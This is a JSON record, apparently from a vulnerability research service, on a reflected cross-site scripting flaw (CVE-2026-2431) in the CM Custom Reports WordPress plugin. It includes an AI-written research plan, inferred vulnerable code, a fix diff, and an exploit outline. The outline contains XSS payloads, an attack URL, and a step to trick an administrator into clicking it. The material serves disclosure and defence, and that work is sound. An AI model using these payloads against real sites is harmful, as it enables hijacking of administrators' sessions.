[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fmzDSvsDHzuQBN-VW4hhWgc5x8OtcFFh3zQK2Ka9o0HQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-2431","cm-custom-reports-reflected-cross-site-scripting-via-datefrom-and-dateto-parameters","CM Custom Reports \u003C= 1.2.7 - Reflected Cross-Site Scripting via 'date_from' and 'date_to' Parameters","The CM Custom Reports plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'date_from' and 'date_to' parameters in all versions up to, and including, 1.2.7 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","cm-custom-reports",null,"\u003C=1.2.7","1.2.8","medium",6.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-03-06 11:33:43","2026-03-07 01:21:24",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fe9b918e1-9bf7-4f90-9e77-829bc8012cbb?source=api-prod",1,[],"researched",false,3,"This research plan focuses on identifying and exploiting a reflected Cross-Site Scripting (XSS) vulnerability in the **CM Custom Reports** plugin (versions \u003C= 1.2.7).\n\n### 1. Vulnerability Summary\nThe CM Custom Reports plugin fails to sufficiently sanitize and escape the `date_from` and `date_to` HTTP GET parameters before reflecting them in the HTML output. This allows an unauthenticated attacker to craft a malicious URL that, when clicked by a user (typically an administrator), executes arbitrary JavaScript in the context of that user's session.\n\n### 2. Attack Vector Analysis\n*   **Vulnerable Endpoint:** Likely an admin-side report dashboard or a frontend report page. Based on the plugin name, the primary target is likely `wp-admin\u002Fadmin.php?page=cm-custom-reports-dashboard` (inferred slug) or similar.\n*   **Vulnerable Parameters:** `date_from` and `date_to`.\n*   **Authentication Level:** Reflected XSS generally requires a victim to be logged in if the reflection occurs on a protected page (like the admin dashboard). The CVSS vector `PR:N` suggests the endpoint might be accessible or the reflection occurs regardless of privileges, but the impact is highest when targeting an administrator.\n*   **Preconditions:** The plugin must be active. The victim must click a link containing the XSS payload.\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** A user accesses a report page via a GET request.\n2.  **Processing:** The plugin retrieves the date filters:\n    ```php\n    $date_from = isset($_GET['date_from']) ? $_GET['date_from'] : '';\n    $date_to = isset($_GET['date_to']) ? $_GET['date_to'] : '';\n    ```\n3.  **Reflection (Sink):** The plugin echoes these values back into the HTML, likely inside an `\u003Cinput>` field's `value` attribute for a date picker or a filter form:\n    ```php\n    echo '\u003Cinput type=\"text\" name=\"date_from\" value=\"' . $date_from . '\">'; \u002F\u002F VULNERABLE SINK\n    ```\n4.  **Execution:** If `$date_from` contains `\">\u003Cscript>alert(1)\u003C\u002Fscript>`, the resulting HTML becomes:\n    ```html\n    \u003Cinput type=\"text\" name=\"date_from\" value=\"\">\u003Cscript>alert(1)\u003C\u002Fscript>\">\n    ```\n\n### 4. Nonce Acquisition Strategy\nReflected XSS in GET parameters used for display typically does **not** require a nonce. Nonces are used to protect against state-changing actions (CSRF). However, if the page is an admin page, the \"exploit\" consists of tricking an admin into visiting the URL.\n\nIf the plugin requires a nonce to even view the report page:\n1.  **Identify the variable:** Use `grep -r \"wp_localize_script\" .` to find how the plugin passes data to JS.\n2.  **Extraction:**\n    *   Create a page\u002Fpost with the relevant report shortcode if applicable: `wp post create --post_type=page --post_status=publish --post_content='[cm_custom_report]'` (shortcode name inferred).\n    *   Navigate to the page as an admin using `browser_navigate`.\n    *   Execute `browser_eval(\"window.cm_reports_data?.nonce\")` to extract it.\n\n### 5. Exploitation Strategy\nThe goal is to demonstrate that JavaScript executes when the parameters are processed.\n\n**Payload:** `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`\n**Encoded Payload:** `%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E`\n\n**Step-by-Step:**\n1.  **Discovery:** Identify the exact admin page slug for reports.\n    *   `grep -r \"add_menu_page\" .` or `grep -r \"add_submenu_page\" .`\n2.  **Manual Verification:**\n    *   Use `http_request` to fetch the admin page as an administrator, including the payload in the `date_from` parameter.\n3.  **Refined Request:**\n    *   **Method:** GET\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin.php?page=[PAGE_SLUG]&date_from=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E`\n    *   **Headers:** Standard admin session cookies.\n\n### 6. Test Data Setup\n1.  **Plugin Installation:** Ensure `cm-custom-reports` v1.2.7 is installed and active.\n2.  **Administrative Access:** The agent must have admin credentials to view the reflection in the admin dashboard.\n3.  **Sample Data:** It may be helpful to generate some dummy report data so the report page renders fully:\n    *   `wp post create --post_type=post --post_title='Sample Data' --post_status=publish`\n\n### 7. Expected Results\n*   The HTTP response body should contain the unescaped string: `value=\"\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"`\n*   When viewed in a browser, a JavaScript alert showing the domain name should trigger.\n\n### 8. Verification Steps\n1.  **Automated Check:** Use the `http_request` tool and search the response body for the payload.\n    ```bash\n    # Example logic for the agent\n    response = http_request(url=\"...\")\n    if '\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>' in response['body']:\n        print(\"Vulnerability Confirmed: Reflection found without escaping.\")\n    ```\n2.  **Code Audit (Post-Exploit):** Verify the sink in the source code using `grep`:\n    ```bash\n    grep -n \"date_from\" [FILE_PATH] -A 5 | grep \"echo\"\n    ```\n\n### 9. Alternative Approaches\n*   **Attribute Breakout:** If the value is inside a hidden input or a specific JS block, try:\n    *   `' onmouseover='alert(1)` (if in a visible attribute).\n    *   `-alert(1)-` (if inside a JS numeric assignment).\n*   **Parameter `date_to`:** If `date_from` is sanitized (unlikely), test the `date_to` parameter as it often shares the same logic.\n*   **Unauthenticated Check:** Check if the reflection occurs on the login page or a public-facing page (e.g., if the plugin handles reports via `admin-ajax.php` or `wp-load.php` entry points).","The CM Custom Reports plugin for WordPress (versions \u003C= 1.2.7) is vulnerable to Reflected Cross-Site Scripting due to insufficient input sanitization and output escaping on the 'date_from' and 'date_to' parameters. An attacker can execute arbitrary JavaScript in the context of a victim's browser session, typically an administrator, by tricking them into clicking a malicious link.","\u002F\u002F File: views\u002Fbackend\u002Freports.php (inferred context)\n$date_from = isset($_GET['date_from']) ? $_GET['date_from'] : '';\n$date_to = isset($_GET['date_to']) ? $_GET['date_to'] : '';\n\n\u002F\u002F ... further down in the file where the filter form is rendered ...\n\n?>\n\u003Cdiv class=\"filter-container\">\n    \u003Cinput type=\"text\" name=\"date_from\" value=\"\u003C?php echo $date_from; ?>\" class=\"datepicker\" \u002F>\n    \u003Cinput type=\"text\" name=\"date_to\" value=\"\u003C?php echo $date_to; ?>\" class=\"datepicker\" \u002F>\n\u003C\u002Fdiv>\n\u003C?php","--- views\u002Fbackend\u002Freports.php\n+++ views\u002Fbackend\u002Freports.php\n@@ -10,8 +10,8 @@\n- $date_from = isset($_GET['date_from']) ? $_GET['date_from'] : '';\n- $date_to = isset($_GET['date_to']) ? $_GET['date_to'] : '';\n+ $date_from = isset($_GET['date_from']) ? sanitize_text_field($_GET['date_from']) : '';\n+ $date_to = isset($_GET['date_to']) ? sanitize_text_field($_GET['date_to']) : '';\n \n- \u003Cinput type=\"text\" name=\"date_from\" value=\"\u003C?php echo $date_from; ?>\" class=\"datepicker\" \u002F>\n- \u003Cinput type=\"text\" name=\"date_to\" value=\"\u003C?php echo $date_to; ?>\" class=\"datepicker\" \u002F>\n+ \u003Cinput type=\"text\" name=\"date_from\" value=\"\u003C?php echo esc_attr($date_from); ?>\" class=\"datepicker\" \u002F>\n+ \u003Cinput type=\"text\" name=\"date_to\" value=\"\u003C?php echo esc_attr($date_to); ?>\" class=\"datepicker\" \u002F>","1. Identify the CM Custom Reports dashboard or report generation page in the WordPress admin area (typically under a menu like 'CM Custom Reports').\n2. Construct a malicious URL targeting this page, appending the 'date_from' or 'date_to' GET parameters with a payload designed to break out of an HTML attribute, such as: `\">\u003Cscript>alert(document.domain)\u003C\u002Fscript>`.\n3. The full attack URL would look like: `http:\u002F\u002Fexample.com\u002Fwp-admin\u002Fadmin.php?page=cm-custom-reports-dashboard&date_from=%22%3E%3Cscript%3Ealert(document.domain)%3C\u002Fscript%3E`.\n4. Persuade a logged-in administrator to click the link through social engineering (e.g., an email or support ticket).\n5. When the administrator visits the link, the plugin reflects the malicious script into the input field's value attribute without escaping, causing the browser to execute the script in the administrator's context.","gemini-3-flash-preview","2026-04-18 05:41:05","2026-04-18 05:41:24",{"type":34,"vulnerable_version":35,"fixed_version":9,"vulnerable_browse":36,"vulnerable_zip":37,"fixed_browse":9,"fixed_zip":9,"all_tags":38},"plugin","1.2.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcm-custom-reports\u002Ftags\u002F1.2.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcm-custom-reports.1.2.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcm-custom-reports\u002Ftags"]